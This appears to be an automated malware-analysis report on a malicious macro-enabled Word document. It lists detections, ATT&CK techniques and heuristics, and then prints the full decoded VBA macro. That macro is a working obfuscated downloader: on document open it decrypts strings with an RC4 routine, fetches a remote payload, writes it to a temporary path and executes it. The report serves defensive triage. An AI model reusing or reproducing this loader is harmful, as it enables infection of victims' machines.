MALICIOUS
400
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
The sample is an Office document containing obfuscated VBA macros, specifically an auto-executing loader within the Document_Open subroutine. The document body explicitly instructs the user to "Enable Editing" and "Enable Content", a common lure for macro-based malware. The VBA code uses CreateObject, GetObject, and CallByName, indicative of malicious intent to execute further stages or download payloads. The presence of ClamAV detections further supports its malicious nature.
Heuristics 12
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
GetObject 94, 55 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
CreateObject "XrKkzVPg7WvjRO", "ChMD3qE" -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
GetObject 94, 55 -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName SlA8nZgzeK, 77, VbMethod, 61, 9, 38 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
LP4SQwJbw = Environ(Ugfb44GjbgnITM(Chr(224) + Chr(205) + Chr(217) + Chr(83) + Chr(26) + Chr(234) + Chr(6), "CbZtV")) & "\" & SHNVp83fxC & Ugfb44GjbgnITM(Chr(161) + Chr(178) + Chr(158) + Chr(123), "XFko3qKMI3uDE") -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12501 bytes |
SHA-256: 7fffee522239fc0727c0f3d170ceacffadb887fe9a2aee52858a9c825628858e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
105 of 172 identifiers look randomly generated (e.g. 'IGjZD2hzAklRRmRHV') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub YSKjArzQKIEy6qelk()
Dim VTn8hvSOK0Vj As Long, Ndttlvn3uwF As Long
VTn8hvSOK0Vj = 5
Ndttlvn3uwF = 6
If VTn8hvSOK0Vj + Ndttlvn3uwF > 2 Then
Ndttlvn3uwF = VTn8hvSOK0Vj + 2
Else
MsgBox 12
End If
Partition 48, 94, 7, 98
T5gcsDb = CVErr(22)
App.StartLogging "PelkE8IUHJuVT", 28
DateDiff "Kqa37CBz", 56, 97
DeleteSetting "G8wtvNJoW9hdIN"
Err.Clear
SyyHN9ynsyTcY3 = CVDate(18)
WeekdayName 37
Round 27, 83
GetSetting 14, 50, 88
DateAdd "Xnzfqwh", 26, 15
Load GrSM
GetObject 94, 55
DateSerial 72, 73, 70
IsError 80
Rate 51, 38, 52
UT72J = Fix(10)
Filter Aj0apnlR8, 10
CreateObject "XrKkzVPg7WvjRO", "ChMD3qE"
ETuHEiyx5gc = LCase(35)
If CDec(34) = True Then HgG97wFGeyirtHsFM = 64
MUlyU7CBz = EOF(71)
CallByName SlA8nZgzeK, 77, VbMethod, 61, 9, 38
URrhntRZE = Dir("JzcENRhjhFAr")
If CDbl(24) = True Then Qyd9EaSrEbaXPD = 93
CUZ0rEFLHU = Cos(10)
Loc 58
FreeFile 63
Stop
Atn 3
Dim IEOG1 As Long, NOVPTwvTJW As Long
IEOG1 = 49
NOVPTwvTJW = 18
If IEOG1 + NOVPTwvTJW > 2 Then
NOVPTwvTJW = IEOG1 + 38
Else
MsgBox 49
End If
End Sub
Sub Document_Open()
Dim YPTwvTJWdagz05aGO As Long, KEADEgz0pLKTi As Long
YPTwvTJWdagz05aGO = 61
KEADEgz0pLKTi = 7
If YPTwvTJWdagz05aGO + KEADEgz0pLKTi > 2 Then
KEADEgz0pLKTi = YPTwvTJWdagz05aGO + 70
Else
MsgBox 27
End If
Dim GWhzWrRztIQ1Suw As Long, TNk8q As Long, IGjZD2hzAklRRmRHV As Long
Dim QxG7LhGZCDXeW0 As Long, USByyLurhl As Long
QxG7LhGZCDXeW0 = 24
USByyLurhl = 73
If QxG7LhGZCDXeW0 + USByyLurhl > 2 Then
USByyLurhl = QxG7LhGZCDXeW0 + 50
Else
MsgBox 45
End If
GWhzWrRztIQ1Suw = 947529939: TNk8q = 0: IGjZD2hzAklRRmRHV = 0
Dim OHZ3 As Long, DAj8l9 As Long
OHZ3 = 26
DAj8l9 = 19
If OHZ3 + DAj8l9 > 2 Then
DAj8l9 = OHZ3 + 86
Else
MsgBox 12
End If
For TNk8q = 1 To GWhzWrRztIQ1Suw
IGjZD2hzAklRRmRHV = IGjZD2hzAklRRmRHV + 1
Next TNk8q
Dim YSPBNrOE2d4V As Long, Dj7D4Fzd13WYD As Long
YSPBNrOE2d4V = 79
Dj7D4Fzd13WYD = 31
If YSPBNrOE2d4V + Dj7D4Fzd13WYD > 2 Then
Dj7D4Fzd13WYD = YSPBNrOE2d4V + 4
Else
MsgBox 34
End If
If IGjZD2hzAklRRmRHV = GWhzWrRztIQ1Suw Then
Dim HIDLQ5cBTJd As Long, XgWpslXor5SaA As Long
HIDLQ5cBTJd = 4
XgWpslXor5SaA = 13
If HIDLQ5cBTJd + XgWpslXor5SaA > 2 Then
XgWpslXor5SaA = HIDLQ5cBTJd + 57
Else
MsgBox 70
End If
KlYQWnBa8vk
Dim XsF9MWK5UfhpyJ As Long, CiHX2Fv7J As Long
XsF9MWK5UfhpyJ = 60
CiHX2Fv7J = 64
If XsF9MWK5UfhpyJ + CiHX2Fv7J > 2 Then
CiHX2Fv7J = XsF9MWK5UfhpyJ + 4
Else
MsgBox 59
End If
Else
Dim CcPsN6Bsrqclp As Long, Gx8youk3 As Long
CcPsN6Bsrqclp = 57
Gx8youk3 = 70
If CcPsN6Bsrqclp + Gx8youk3 > 2 Then
Gx8youk3 = CcPsN6Bsrqclp + 84
Else
MsgBox 43
End If
YSKjArzQKIEy6qelk
Dim O2eRpHFs2GPz As Long, WFDRZBcM7ble As Long
O2eRpHFs2GPz = 66
WFDRZBcM7ble = 63
If O2eRpHFs2GPz + WFDRZBcM7ble > 2 Then
WFDRZBcM7ble = O2eRpHFs2GPz + 73
Else
MsgBox 44
End If
End If
Dim HiJWpaWWkHAX As Long, TJ8XZHSvjA As Long
HiJWpaWWkHAX = 30
TJ8XZHSvjA = 27
If HiJWpaWWkHAX + TJ8XZHSvjA > 2 Then
TJ8XZHSvjA = HiJWpaWWkHAX + 36
Else
MsgBox 8
End If
End Sub
Function SHNVp83fxC() As String
Dim PsYglGuESKnKj9y As Long, GRjnF7SGI2kUW As Long
PsYglGuESKnKj9y = 2
GRjnF7SGI2kUW = 57
If PsYglGuESKnKj9y + GRjnF7SGI2kUW > 2 Then
GRjnF7SGI2kUW = PsYglGuESKnKj9y + 17
Else
MsgBox 13
End If
Dim HXXWT() As Byte, QyMMZ3F() As Byte, MXRgTGQW8MLsW As Long, JNRunBywPevFJ As Long, BK4eM8T As String, BmXGJtfjfhlHzmbml As String, EeVv As Long
Dim Xd4NyZliu As Long, RLqyyJvBDjxTn As Long
Xd4NyZliu = 23
RLqyyJvBDjxTn = 21
If Xd4NyZliu + RLqyyJvBDjxTn > 2 Then
RLqyyJvBDjxTn = Xd4NyZliu + 52
Else
MsgBox 59
End If
EeVv = 0
Dim L42rPCpp82 As Long, VA6UHmbgbERya As Long
L42rPCpp82 = 51
VA6UHmbgbERya = 90
If L42rPCpp82 + VA6UHmbgbERya > 2 Then
VA6UHmbgbERya = L42rPCpp82 + 45
Else
MsgBox 54
End If
V7IAjrXK:
Dim MOiZSmS As Long, V9GRYn6v59UFOg As Long
MOiZSmS = 28
V9GRYn6v59UFOg = 19
If MOiZSmS + V9GRYn6v59UFOg > 2 Then
V9GRYn6v59UFOg = MOiZSmS + 20
Else
MsgBox 17
End If
Randomize
BmXGJtfjfhlHzmbml = Int(30 * Rnd)
If BmXGJtfjfhlHzmbml < 4 Then GoTo V7IAjrXK
EeVv = BmXGJtfjfhlHzmbml
If EeVv > 0& Then
Dim E3XwpmDeDSOM75r As Long, B3dv9q2l As Long
E3XwpmDeDSOM75r = 37
B3dv9q2l = 65
If E3XwpmDeDSOM75r + B3dv9q2l > 2 Then
B3dv9q2l = E3XwpmDeDSOM75r + 7
Else
MsgBox 9
End If
BK4eM8T = Ugfb44GjbgnITM(Chr(205) + Chr(245) + Chr(38) + Chr(53) + Chr(72) + Chr(243) + Chr(199) + Chr(103) + Chr(137) + Chr(103), "QnXhmkThT4uA")
Randomize
HXXWT = BK4eM8T
MXRgTGQW8MLsW = Len(BK4eM8T) - 1&
EeVv = (EeVv * 2&) - 1&
ReDim QyMMZ3F(EeVv) As Byte
Dim CpC4vZwBQ6iKo As Long, ReLbv9cdUfZSmS As Long
CpC4vZwBQ6iKo = 17
ReLbv9cdUfZSmS = 5
If CpC4vZwBQ6iKo + ReLbv9cdUfZSmS > 2 Then
ReLbv9cdUfZSmS = CpC4vZwBQ6iKo + 40
Else
MsgBox 8
End If
For JNRunBywPevFJ = 0& To EeVv Step 2&
QyMMZ3F(JNRunBywPevFJ) = HXXWT(CLng(MXRgTGQW8MLsW * Rnd) * 2&)
Next
Dim SLxmGur As Long, XDFMEd As Long
SLxmGur = 55
XDFMEd = 63
If SLxmGur + XDFMEd > 2 Then
XDFMEd = SLxmGur + 13
Else
MsgBox 63
End If
End If
Dim GSYMn9Xh5V As Long, RZKdvdCjRO0d As Long
GSYMn9Xh5V = 69
RZKdvdCjRO0d = 93
If GSYMn9Xh5V + RZKdvdCjRO0d > 2 Then
RZKdvdCjRO0d = GSYMn9Xh5V + 48
Else
MsgBox 85
End If
SHNVp83fxC = QyMMZ3F
Dim N6uCBnfiOi As Long, K0Gfn9GRYn6v As Long
N6uCBnfiOi = 75
K0Gfn9GRYn6v = 2
If N6uCBnfiOi + K0Gfn9GRYn6v > 2 Then
K0Gfn9GRYn6v = N6uCBnfiOi + 22
Else
MsgBox 62
End If
End Function
Sub WcQVFsK4DL9(Ue92QqKH32 As Long)
Dim Ov45f9QCzP As Long, DdFcbGclryn As Long
Ov45f9QCzP = 50
DdFcbGclryn = 85
If Ov45f9QCzP + DdFcbGclryn > 2 Then
DdFcbGclryn = Ov45f9QCzP + 25
Else
MsgBox 61
End If
Dim DMhDljxVsr6 As Long
Dim QgVteO4TNt As Long, EvpbKhGgq6EU As Long
QgVteO4TNt = 27
EvpbKhGgq6EU = 55
If QgVteO4TNt + EvpbKhGgq6EU > 2 Then
EvpbKhGgq6EU = QgVteO4TNt + 69
Else
MsgBox 72
End If
DMhDljxVsr6 = Timer + Ue92QqKH32
Do While Timer < DMhDljxVsr6
DoEvents
Loop
Dim RAoBrQ5Q6g As Long, JBStUw4ctHHYgZR As Long
RAoBrQ5Q6g = 77
JBStUw4ctHHYgZR = 50
If RAoBrQ5Q6g + JBStUw4ctHHYgZR > 2 Then
JBStUw4ctHHYgZR = RAoBrQ5Q6g + 58
Else
MsgBox 8
End If
End Sub
Function Ugfb44GjbgnITM(ByVal MaccjxK As String, ByVal HcFB8mRvWJ9Ciu As String) As String
Dim MRKNJMVMOAD9 As Long, Iprxm0REljpGg As Long
MRKNJMVMOAD9 = 43
Iprxm0REljpGg = 80
If MRKNJMVMOAD9 + Iprxm0REljpGg > 2 Then
Iprxm0REljpGg = MRKNJMVMOAD9 + 40
Else
MsgBox 86
End If
On Error Resume Next
Dim PTwVZ As Long, Nd2e1Ula7htA As Long
PTwVZ = 73
Nd2e1Ula7htA = 15
If PTwVZ + Nd2e1Ula7htA > 2 Then
Nd2e1Ula7htA = PTwVZ + 62
Else
MsgBox 47
End If
Dim L8AKZD66bB7W(0 To 255) As Integer, Hm7oMkeRV As Long, YX0g As Long, MQQsLu1BTX8Dq0 As Long, NorVJ9d9lb() As Byte, PwLiyYVTCJ9HNF() As Byte, TSGZbCtxIO As Byte
Dim Nprid As Long, Qr8I As Long
Nprid = 20
Qr8I = 74
If Nprid + Qr8I > 2 Then
Qr8I = Nprid + 12
Else
MsgBox 72
End If
NorVJ9d9lb() = StrConv(HcFB8mRvWJ9Ciu, vbFromUnicode)
Dim Xi24xWccgR As Long, Y6cVvfr As Long
Xi24xWccgR = 94
Y6cVvfr = 98
If Xi24xWccgR + Y6cVvfr > 2 Then
Y6cVvfr = Xi24xWccgR + 38
Else
MsgBox 93
End If
For Hm7oMkeRV = 0 To 255
L8AKZD66bB7W(Hm7oMkeRV) = Hm7oMkeRV
Next Hm7oMkeRV
Hm7oMkeRV = 0
YX0g = 0
MQQsLu1BTX8Dq0 = 0
For Hm7oMkeRV = 0 To 255
YX0g = (YX0g + L8AKZD66bB7W(Hm7oMkeRV) + NorVJ9d9lb(Hm7oMkeRV Mod Len(HcFB8mRvWJ9Ciu))) Mod 256
TSGZbCtxIO = L8AKZD66bB7W(Hm7oMkeRV)
L8AKZD66bB7W(Hm7oMkeRV) = L8AKZD66bB7W(YX0g)
L8AKZD66bB7W(YX0g) = TSGZbCtxIO
Next Hm7oMkeRV
Hm7oMkeRV = 0
YX0g = 0
MQQsLu1BTX8Dq0 = 0
PwLiyYVTCJ9HNF() = StrConv(MaccjxK, vbFromUnicode)
For Hm7oMkeRV = 0 To Len(MaccjxK)
YX0g = (YX0g + 1) Mod 256
MQQsLu1BTX8Dq0 = (MQQsLu1BTX8Dq0 + L8AKZD66bB7W(YX0g)) Mod 256
TSGZbCtxIO = L8AKZD66bB7W(YX0g)
L8AKZD66bB7W(YX0g) = L8AKZD66bB7W(MQQsLu1BTX8Dq0)
L8AKZD66bB7W(MQQsLu1BTX8Dq0) = TSGZbCtxIO
PwLiyYVTCJ9HNF(Hm7oMkeRV) = PwLiyYVTCJ9HNF(Hm7oMkeRV) Xor (L8AKZD66bB7W((L8AKZD66bB7W(YX0g) + L8AKZD66bB7W(MQQsLu1BTX8Dq0)) Mod 256))
Next Hm7oMkeRV
Dim TnpwPGwRjCSzhei As Long, LwB0XsJCZI056VSq As Long
TnpwPGwRjCSzhei = 38
LwB0XsJCZI056VSq = 40
If TnpwPGwRjCSzhei + LwB0XsJCZI056VSq > 2 Then
LwB0XsJCZI056VSq = TnpwPGwRjCSzhei + 81
Else
MsgBox 83
End If
Ugfb44GjbgnITM = StrConv(PwLiyYVTCJ9HNF, vbUnicode)
Dim MsA2YLZo As Long, XVT6XWFinHD As Long
MsA2YLZo = 8
XVT6XWFinHD = 56
If MsA2YLZo + XVT6XWFinHD > 2 Then
XVT6XWFinHD = MsA2YLZo + 85
Else
MsgBox 71
End If
End Function
Sub KlYQWnBa8vk()
Dim IgKZXvS7rAVn As Long, FOyT As Long
IgKZXvS7rAVn = 24
FOyT = 8
If IgKZXvS7rAVn + FOyT > 2 Then
FOyT = IgKZXvS7rAVn + 56
Else
MsgBox 85
End If
Dim LP4SQwJbw As String, JgtjuQb As Object, H41FjQt0I8 As Integer
Dim J4lCrIB59O As Long, B7GbPyC9Qrg3q As Long
J4lCrIB59O = 42
B7GbPyC9Qrg3q = 29
If J4lCrIB59O + B7GbPyC9Qrg3q > 2 Then
B7GbPyC9Qrg3q = J4lCrIB59O + 65
Else
MsgBox 4
End If
LP4SQwJbw = Environ(Ugfb44GjbgnITM(Chr(224) + Chr(205) + Chr(217) + Chr(83) + Chr(26) + Chr(234) + Chr(6), "CbZtV")) & "\" & SHNVp83fxC & Ugfb44GjbgnITM(Chr(161) + Chr(178) + Chr(158) + Chr(123), "XFko3qKMI3uDE")
Dim WxAqKxyuYH As Long, C9mBVgbjoyQjW As Long
WxAqKxyuYH = 4
C9mBVgbjoyQjW = 17
If WxAqKxyuYH + C9mBVgbjoyQjW > 2 Then
C9mBVgbjoyQjW = WxAqKxyuYH + 30
Else
MsgBox 62
End If
Set JgtjuQb = CreateObject(Ugfb44GjbgnITM(Chr(56) + Chr(59) + Chr(153) + Chr(193) + Chr(178) + Chr(33) + Chr(191) + Chr(112) + Chr(71) + Chr(192) + Chr(48) + Chr(120) + Chr(194) + Chr(231) + Chr(138) + Chr(247) + Chr(132), "MAl0HT5gx"))
Dim TG7GbPy As Long, NtkLhASiKWFrec7 As Long
TG7GbPy = 85
NtkLhASiKWFrec7 = 95
If TG7GbPy + NtkLhASiKWFrec7 > 2 Then
NtkLhASiKWFrec7 = TG7GbPy + 66
Else
MsgBox 53
End If
JgtjuQb.Open Ugfb44GjbgnITM(Chr(224) + Chr(119) + Chr(225), "W72TYHcku5Pv9g9Pm"), Ugfb44GjbgnITM(Chr(62) + Chr(63) + Chr(189) + Chr(157) + Chr(205) + Chr(19) + Chr(97) + Chr(199) + Chr(190) + Chr(137) + Chr(163) + Chr(49) + Chr(5) + Chr(141) + Chr(148) + Chr(199) + Chr(169) + Chr(171) + Chr(161) + Chr(249) + Chr(131) + Chr(38) + Chr(88) + Chr(31) + Chr(61) + Chr(26) + Chr(23), "PlffXCe"), False
Dim Og3CQS8xQE As Long, YLP As Long
Og3CQS8xQE = 83
YLP = 61
If Og3CQS8xQE + YLP > 2 Then
YLP = Og3CQS8xQE + 56
Else
MsgBox 44
End If
JgtjuQb.setRequestHeader Ugfb44GjbgnITM(Chr(77) + Chr(148) + Chr(119) + Chr(87) + Chr(252) + Chr(95) + Chr(39) + Chr(79) + Chr(241) + Chr(190), "DzgPQfGyYkNZdgEBY"), Ugfb44GjbgnITM(Chr(57) + Chr(104) + Chr(4) + Chr(89) + Chr(185) + Chr(105) + Chr(22) + Chr(60) + Chr(236) + Chr(114) + Chr(96), "WJln2tRjbC9Qrg3q")
JgtjuQb.send
If JgtjuQb.readyState = 4 And JgtjuQb.Status = 200 Then
Dim W75DbYLrvN As Long, PmurfHXxmH As Long
W75DbYLrvN = 62
PmurfHXxmH = 25
If W75DbYLrvN + PmurfHXxmH > 2 Then
PmurfHXxmH = W75DbYLrvN + 64
Else
MsgBox 74
End If
H41FjQt0I8 = FreeFile
Open LP4SQwJbw For Binary Access Write Lock Write As #H41FjQt0I8
Put #H41FjQt0I8, , Ugfb44GjbgnITM(StrConv(JgtjuQb.ResponseBody, vbUnicode), Ugfb44GjbgnITM(Chr(51) + Chr(37) + Chr(27) + Chr(191) + Chr(199) + Chr(79) + Chr(147) + Chr(169) + Chr(107), "O0eFDO"))
Close #H41FjQt0I8
Dim ABKKQOTEh2vzNL As Long, WdYnXfABwyefmrX As Long
ABKKQOTEh2vzNL = 91
WdYnXfABwyefmrX = 39
If ABKKQOTEh2vzNL + WdYnXfABwyefmrX > 2 Then
WdYnXfABwyefmrX = ABKKQOTEh2vzNL + 50
Else
MsgBox 42
End If
WcQVFsK4DL9 1
Dim QzUrPl20C42VPX As Long, Umojeac95 As Long
QzUrPl20C42VPX = 86
Umojeac95 = 55
If QzUrPl20C42VPX + Umojeac95 > 2 Then
Umojeac95 = QzUrPl20C42VPX + 75
Else
MsgBox 86
End If
CreateObject(Ugfb44GjbgnITM(Chr(255) + Chr(151) + Chr(243) + Chr(155) + Chr(224) + Chr(93) + Chr(246) + Chr(167) + Chr(65) + Chr(196) + Chr(166) + Chr(124) + Chr(209), "IW7pA2Du4A1IyqHjJ")).exec """" & LP4SQwJbw & """"
Dim OQKuxKteCVA As Long, Kigkq4bIX9UdAIfTn As Long
OQKuxKteCVA = 92
Kigkq4bIX9UdAIfTn = 35
If OQKuxKteCVA + Kigkq4bIX9UdAIfTn > 2 Then
Kigkq4bIX9UdAIfTn = OQKuxKteCVA + 59
Else
MsgBox 87
End If
End If
Dim SXOPF5qMPjl As Long, BKn1OVeUP As Long
SXOPF5qMPjl = 76
BKn1OVeUP = 69
If SXOPF5qMPjl + BKn1OVeUP > 2 Then
BKn1OVeUP = SXOPF5qMPjl + 91
Else
MsgBox 97
End If
Set JgtjuQb = Nothing
Dim QxYM3vr68t4 As Long, S2RmGcL9W As Long
QxYM3vr68t4 = 21
S2RmGcL9W = 55
If QxYM3vr68t4 + S2RmGcL9W > 2 Then
S2RmGcL9W = QxYM3vr68t4 + 6
Else
MsgBox 56
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 32768 bytes |
SHA-256: a804ab787b7b760818596b22d39a80995ac20f9ba484a675f46f5f63d9c77264 |
|||
|
Detection
ClamAV:
Doc.Malware.Chronos-6897935-0
Obfuscation or payload:
likely
205 of 350 identifiers look randomly generated (e.g. 'DFDD2508DB38BE3CBE3CBE3CBE3C') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.